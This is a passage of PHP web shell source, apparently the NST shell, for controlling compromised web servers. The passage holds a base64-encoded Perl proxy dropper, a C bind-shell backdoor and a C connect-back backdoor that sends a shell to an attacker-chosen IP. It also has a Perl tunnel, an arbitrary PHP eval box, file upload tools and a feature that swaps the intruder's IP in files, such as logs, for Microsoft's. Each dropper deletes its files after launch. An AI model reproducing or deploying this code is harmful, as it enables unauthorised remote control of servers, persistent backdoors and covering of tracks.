lc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg=="; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_proxy.pl","w"); +fwrite($fp,base64_decode($perl_proxy_scp)); +passthru("nohup perl /tmp/nst_perl_proxy.pl $port &"); +unlink("/tmp/nst_perl_proxy.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_proxy_tmp"); +$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w"); +fwrite($fp,base64_decode($perl_proxy_scp)); +passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &"); +unlink(".nst_proxy_tmp/nst_perl_proxy.pl"); +rmdir(".nst_proxy_tmp"); +} +} +$show_ps="1"; +}#end of start perl_proxy + +if($_POST['c_bd']){ +$port=$_POST['port']; +$c_bd_scp = "#define PORT $port +#include <stdio.h> +#include <signal.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netinet/in.h> + +int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; +struct sockaddr_in serv_addr; +struct sockaddr_in client_addr; + +int main () +{ + soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (soc_des == -1) + exit(-1); + bzero((char *) &serv_addr, sizeof(serv_addr)); + serv_addr.sin_family = AF_INET; + serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); + serv_addr.sin_port = htons(PORT); + soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); + if (soc_rc != 0) + exit(-1); + if (fork() != 0) + exit(0); + setpgrp(); + signal(SIGHUP, SIG_IGN); + if (fork() != 0) + exit(0); + soc_rc = listen(soc_des, 5); + if (soc_rc != 0) + exit(0); + while (1) { + soc_len = sizeof(client_addr); + soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); + if (soc_cli < 0) + exit(0); + cli_pid = getpid(); + server_pid = fork(); + if (server_pid != 0) { + dup2(soc_cli,0); + dup2(soc_cli,1); + dup2(soc_cli,2); + execl(\"/bin/sh\",\"sh\",(char *)0); + close(soc_cli); + exit(0); + } + close(soc_cli); + } +} + +"; + + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_c_bd.c","w"); +fwrite($fp,"$c_bd_scp"); +passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd"); +passthru("nohup /tmp/nst_bd &"); +unlink("/tmp/nst_c_bd.c"); +unlink("/tmp/nst_bd"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bd_tmp"); +$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w"); +fwrite($fp,"$c_bd_scp"); +passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd"); +passthru("nohup .nst_bd_tmp/nst_bd &"); +unlink(".nst_bd_tmp/nst_bd"); +unlink(".nst_bd_tmp/nst_c_bd.c"); +rmdir(".nst_bd_tmp"); +} +} +$show_ps="1"; +}#end of c bd + + +if($_POST['bc_c']){ # nc -l -p 4500 +$port_c = $_POST['port_c']; +$ip=$_POST['ip']; +$bc_c_scp = "#include <stdio.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <unistd.h> +#include <fcntl.h> + +#include <netinet/in.h> +#include <netdb.h> + +int fd, sock; +int port = $port_c; +struct sockaddr_in addr; + +char mesg[] = \"::Connect-Back Backdoor:: CMD: \"; +char shell[] = \"/bin/sh\"; + +int main(int argc, char *argv[]) { + while(argc<2) { + fprintf(stderr, \" %s <ip> \", argv[0]); + exit(0); } + +addr.sin_family = AF_INET; +addr.sin_port = htons(port); +addr.sin_addr.s_addr = inet_addr(argv[1]); +fd = socket(AF_INET, SOCK_STREAM, 0); +connect(fd, (struct sockaddr*)&addr, sizeof(addr)); + +send(fd, mesg, sizeof(mesg), 0); + +dup2(fd, 0); +dup2(fd, 1); +dup2(fd, 2); +execl(shell, \"in.telnetd\", 0); + +close(fd); +return 1; +} + +"; + +if(is_writable("/tmp")){ +if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");} +if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");} +$fp=fopen("/tmp/nst_c_bc_c.c","w"); +$bd_c_scp=str_replace("!n","\n",$bd_c_scp); +fwrite($fp,"$bc_c_scp"); +passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c"); +passthru("nohup /tmp/nst_bc_c $ip &"); +unlink("/tmp/nst_bc_c"); +unlink("/tmp/nst_bc_c.c"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bc_c_tmp"); +$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w"); +$bd_c_scp=str_replace("!n","\n",$bd_c_scp); +fwrite($fp,"$bc_c_scp"); +passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c"); +passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &"); +unlink(".nst_bc_c_tmp/nst_bc_c.c"); +unlink(".nst_bc_c_tmp/nst_bc_c"); +rmdir(".nst_bc_c_tmp"); +} +} +$show_ps="1"; + +}#end of back connect C + + +if($_POST['datapipe_pl']){ +$port_2=$_POST['port_2']; +$port_3=$_POST['port_3']; +$ip=$_POST['ip']; +$datapipe_pl = " +#!/usr/bin/perl +# coded by CuTTer (rus hacker) +use IO::Socket; +use POSIX; + +\$localport=$port_2; +\$host=\"$ip\"; +\$port=$port_3; + +\$daemon=1; + +\$DIR = undef; + +## آûâîنèٍü ëîم ٌîلûٍèé (1-نà, 0-يهٍ) +\$log=0; + + + + +\$| = 1; + +if (\$daemon){ + print \"3anycKaeM daemon\n\"; + + \$pid = fork; + exit if \$pid; + die \"Couldn't fork: \$!\" unless defined(\$pid); + POSIX::setsid() or die \"Can't start a new session: \$!\"; +} + +%o = ('port' => \$localport, + 'toport' => \$port, + 'tohost' => \$host); + +\$ah = IO::Socket::INET->new( + 'LocalPort' => \$localport, + 'Reuse' => 1, + 'Listen' => 10) + || die \"حهëüçے îٍêًûٍü ٌîêهٍ نëے ٌîهنèيهيèé: \$!\"; + +print \"حà÷èيàهى âûïîëيهيèے ِèêëà.\n\" if \$log; +\$SIG{'CHLD'} = 'IGNORE'; +\$num = 0; +while (1) { + \$ch = \$ah->accept(); + if (!\$ch) { + print STDERR \"دًهًâàيî âûïîëهيèه accept: \$!\n\"; + next; + } + + printf(\"حîâûé êëèهيٍ: host %s, port %s.\n\", + \$ch->peerhost(), \$ch->peerport()) if \$log; + ++\$num; + \$pid = fork(); + if (!defined(\$pid)) { + print STDERR \"حهâîçىîويî âûïîëيèٍü fork: \$!\n\"; + } elsif (\$pid == 0) { +## حîâûé ïًîِهٌٌ + \$ah->close(); + Run(\%o, \$ch, \$num); + } else { + print \"Parent: Fork ïًîّهë ٌَïهّيî, çàêًûâàهى ٌîêهٍ.\n\" if \$log; + \$ch->close(); + } +} + + +sub Run { + my(\$o, \$ch, \$num) = @_; + my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'}, + 'PeerPort' => \$o->{'toport'}); + print(\"Child: ؤهëàهى ًهنèًهêٍ يà \$o->{'tohost'}, ïîًٍ \$o->{'toport'}.\n\") if \$log; + if (!\$th) { + printf STDERR (\"Child: دًهًâàي ًهنèًهêٍ يà %s, ïîًٍ %s.\n\", + \$o->{'tohost'}, \$o->{'toport'}); + exit 0; + } + + my \$fh; + if (\$o->{'dir'}) { + \$fh = Symbol::gensym(); + open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\") + or die \"Child: دًهًâàيî ٌîçنàيèه ëîم ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\"; + } + + \$ch->autoflush(); + \$th->autoflush(); + while (\$ch || \$th) { + print \"Child: آêë‏÷àهى ِèêë.\n\" if \$log; + my \$rin = \"\"; + vec(\$rin, fileno(\$ch), 1) = 1 if \$ch; + vec(\$rin, fileno(\$th), 1) = 1 if \$th; + my(\$rout, \$eout); + select(\$rout = \$rin, undef, \$eout = \$rin, 120); + if (!\$rout && !\$eout) { + print STDERR \"Child: خّèلêà Timeout.\n\"; + } + my \$cbuffer = \"\"; + my \$tbuffer = \"\"; + + if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) { + print \"Child: ئنهى نàييûُ îٍ êëèهيٍà.\n\" if \$log; + my \$result = sysread(\$ch, \$tbuffer, 1024); + if (!defined(\$result)) { + print STDERR \"Child: خّèلêà ïًè ٌ÷èٍûâàيèè نàييûُ êëèهيٍà: \$!\n\"; + exit 0; + } + if (\$result == 0) { + print \"Child: تëèهيٍ îٌٍîهنèيèëٌے.\n\" if \$log; + exit 0; + } + + print \"Child: ؤàييûه: \$cbuffer\n\" if \$log; + } + + if (\$th && (vec(\$eout, fileno(\$th), 1) || vec(\$rout, fileno(\$th), 1))) { + print \"Child: ئنهى نàييûُ.\n\" if \$log; + my \$result = sysread(\$th, \$cbuffer, 1024); + if (!defined(\$result)) { + print STDERR \"Child: حهâîçىîويî ٌ÷èٍàٍü نàييûه: \$!\n\"; + exit 0; + } + + if (\$result == 0) { + print \"Child: دًîèçîّëî îٌٍîهنèيهيèه.\n\" if \$log; + exit 0; + } + + print \"Child: ؤàييûه: \$cbuffer\n\" if \$log; + } + + if (\$fh && \$tbuffer) { + (print \$fh \$tbuffer); + } + + while (my \$len = length(\$tbuffer)) { + print \"Child: خٍïًàâëےهى \$len لàéٍ.\n\" if \$log; + my \$res = syswrite(\$th, \$tbuffer, \$len); + print \"Child: ؤàييûه îٍïًàâëهيû.\n\" if \$log; + if (\$res > 0) { + \$tbuffer = substr(\$tbuffer, \$res); + } else { + print STDERR \"Child: حهâîçىîويî îٍïًàâèٍü نàييûه: \$!\n\"; + } + } + + while (my \$len = length(\$cbuffer)) { + print \"Child: خٍïًàâëےهى \$len لàéٍ êëèهيٍَ.\n\" if \$log; + my \$res = syswrite(\$ch, \$cbuffer, \$len); + print \"Child: ؤàييûه îٍïًàâëهيû..\n\" if \$log; + if (\$res > 0) { + \$cbuffer = substr(\$cbuffer, \$res); + } else { + print STDERR \"Child: حهâîçىîويî îٍïًàâèٍü نàييûه: \$!\n\"; + } + } + } +} + +"; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_datapipe.pl","w"); +fwrite($fp,"$datapipe_pl"); +passthru("nohup perl /tmp/nst_perl_datapipe.pl &"); +unlink("/tmp/nst_perl_datapipe.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_datapipe_tmp"); +$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w"); +fwrite($fp,"$datapipe_pl"); +passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &"); +unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl"); +rmdir(".nst_datapipe_tmp"); +} +} +$show_ps="1"; + +}#end of datapipe perl + + + + + +if($show_ps=="1"){ +print "<center><b>[ps ux]</b></center><br><br>"; +print "<pre>"; +passthru("ps ux"); +print "</pre><br><br>"; +} + + + +echo "<form method=post><b>md5:</b><br><input name=md5 size=30> +<Br> +md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>] +</form> +"; +@$md5=@$_POST['md5']; +if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";} +echo "<br> +<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>"; +if(@$_POST['base64']){ +@$base64=$_POST['base64']; +echo " +<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br> +Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";} +echo "<br> +<form method=post><b>DES:</b><br><input name=des size=30><br> +John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>"; +if(@$_POST['des']){ +@$des=@$_POST['des']; +echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";} + +print " +<b>eval:</b<br> +(example: print \"Hello World\";) +<form method=post> +<font color=red><b>&lt;?</b><br> +<textarea name=eval rows=15 cols=113></textarea><br> +<b>?&gt;</b></font><br> +<input type=submit value=Run style='width:150px;'> +</form><br> +"; + +function eval_sl($editf){ +if(get_magic_quotes_gpc()==1){ +$editf=stripslashes($editf); +} +return $editf; +} + + +if($_POST['eval']){ +print "<b>RESULT:<br><br></b>"; +eval(eval_sl($_POST['eval'])); +print "<br><br>"; + +print "<font color=green><b>PHP:</b><br>\r\n\r\n"; +print "&lt;?\r\n"; +print "<br>"; +print htmlspecialchars(eval_sl(($_POST['eval']))); +print "<br>"; +print "?&gt;\r\n\r\n</font><br><br>"; + +} + +echo $copyr; +exit;} + +if(@$_GET['replace']=="1"){ +$ip=@$_SERVER['REMOTE_ADDR']; +$d=$_GET['d']; +$e=$_GET['e']; +@$de=$d."/".$e; +$de=str_replace("//","/",$de); +$e=@$e; +echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>"; +echo " +Replace tool:<br> +(You can replace any text)<br> +File: $de<br> +<form method=post> +1. Your ip.<br> +2. microsoft.com ip :)<br> +Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156> +<input type=submit name=doit value=Replace> +</form> +"; + +if(@$_POST['doit']){ +@$thisX=$_POST['thisX']; +@$bythis=$_POST['bythis']; +@$e=$_GET['e']; +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$rpl = @fread ($fd, @filesize ($filename)); +$re=str_replace("$thisX","$bythis",$rpl); +$x=@fopen("$d/$e","w"); +@fwrite($x,"$re"); +echo "<br><center>$thisX Replaced by $bythis<br> +[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>"; + +} +echo $copyr; +exit;} + + +if(@$_GET['t']=="upload"){ +echo "<br> +<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br> +File upload:<br> +<form enctype=\"multipart/form-data\" method=post> +<input type=file name=text size=50><br> +<input name=where size=52 value='$d'><br> +New file name:<br> +<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br> +<input type=submit value=Upload name=uploadf> +</form><br> +"; + +if(@$_POST['uploadf']){ +$where=$_POST['where']; +$newf=$_POST['newf']; +$where=str_replace("//","/",$where); +if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;} +$uploadfile = "$where/".$newf; +if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) { +$uploadfile=str_replace("//","/",$uploadfile); +echo "<i><br>Uploaded to $uploadfile</i><br>"; +}else{ +echo "<i><br>Error</i><br>";} +} +} + +if(@$_GET['t']=="massupload"){ +echo " +Mass upload:<br> +<form enctype=\"multipart/form-data\" method=post> +<input type=file name=text1 size=43> <input type=file name=text11 size=43><br> +<input type=file name=text2 size=43> <input type=file name=text12 size=43><br> +<input type=file name=text3 size=43> <input type=file name=text13 size=43><br> +<input type=file name=text4 size=43> <input type=file name=text14 size=43><br> +<input type=file name=text5 size=43> <input type=file name=text15 size=43><br> +<input type=file name=text6 size=43> <input type=file name=text16 size=43><br> +<input type=file name=text7 size=43> <input type=file name=text17 size=43><br> +<input type=file name=text8 size=43> <input type=file name=text18 size=43><br> +<input type=file name=text9 size=43> <input type=file name=text19 size=43><br> +<input type=file name=text10 size=43> <input type=file name=text20 size=43><br> +<input name=where size=43 value='$d'><br> +<input type=submit value=Upload name=massupload> +</form><br>"; + +if(@$_POST['massupload']){ +$where=@$_POST['where']; +$uploadfile1 = "$where/".@$_FILES['text1']['name']; +$uploadfile2 = "$where/".@$_FILES['text2']['name']; +$uploadfile3 = "$where/".@$_FILES['text3']['name']; +$uploadfile4 = "$where/".@$_FILES['text4']['name']; +$uploadfile5 = "$where/".@$_FILES['text5']['name']; +$uploadfile6 = "$where/".@$_FILES['text6']['name']; +$uploadfile7 = "$where/".@$_FILES['text7']['name']; +$uploadfile8 = "$where/".@$_FILES['text8']['name']; +$uploadfile9 = "$where/".@$_FILES['text9']['name']; +$uploadfile10 = "$where/".@$_FILES['text10']['name']; +$uploadfile11 = "$where/".@$_FILES['text11']['name']; +$uploadfile12 = "$where/".@$_FILES['text12']['name']; +$uploadfile13 = "$where/".@$_FILES['text13']['name']; +$uploadfile14 = "$where/".@$_FILES['text14']['name']; +$uploadfile15 = "$where/".@$_FILES['text15']['name']; +$uploadfile16 = "$where/".@$_FILES['text16']['name']; +$uploadfile17 = "$where/".@$_FILES['text17']['name']; +$uploadfile18 = "$where/".@$_FILES['text18']['name']; +$uploadfile19 = "$where/".@$_FILES['text19']['name']; +$uploadfile20 = "$where/".@$_FILES['text20']['name']; +if 